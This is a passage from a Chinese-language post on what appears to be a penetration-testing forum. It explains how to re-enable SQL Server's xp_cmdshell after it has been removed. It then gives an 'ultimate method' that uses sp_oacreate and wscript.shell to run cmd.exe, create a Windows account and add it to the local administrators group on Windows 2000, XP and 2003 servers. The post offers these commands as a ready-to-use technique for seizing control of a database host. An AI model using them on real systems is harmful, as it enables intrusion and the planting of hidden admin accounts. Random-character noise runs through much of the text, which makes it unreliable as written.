+ v6 L1 s6 G1 d( X; s然后按F5键命令执行完毕
+ O( f7 y! Z3 J+ n
! N% m! V: m) f& `+ s$ q/ `- @' d9 A
三.常见情况恢复执行xp_cmdshell.
( z! @3 ^. p; A! B% V( @  H9 h
. n# @8 u+ ]' z9 K
1 未能找到存储过程'master..xpcmdshell'.
   恢复方法：查询分离器连接后,
' B; G$ D% F1 e0 L# [第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
/ [$ W+ V/ D+ v5 Q# z  o1 _第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
& n1 d1 w! \& p" R3 G8 W; A然后按F5键命令执行完毕
3 x' V( Q$ A! g' n" I  }
- O( m; a9 h) J' E! ~2 k! i* g2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
恢复方法：查询分离器连接后,
% r% f; h' q; w1 C) a$ O. N第一步执行：sp_dropextendedproc "xp_cmdshell"
第二步执行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
% a* |8 |; O1 O1 O* `
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
. l. R5 [, H9 |- U2 ?" c恢复方法：查询分离器连接后,
" p- c/ x9 y6 s3 g第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
然后按F5键命令执行完毕
! e0 w: g& \+ t# {/ Z0 h4 s
9 r0 l4 U& E. h5 J, R# ^  `四.终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
, A" G7 w) F" ~# l3 S) y* r% ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
/ {  E7 E# v! \6 O3 i  m2 F
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'

xp或2003server系统:
. ~1 D* ?; }+ Y5 N& h* H' |, V
  n* A" S5 A" u% ?declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'

6 o. K# w# O$ F) k( G: i/ k4 R; Tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
) ~! ]% c. C' V9 p- p. ~

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2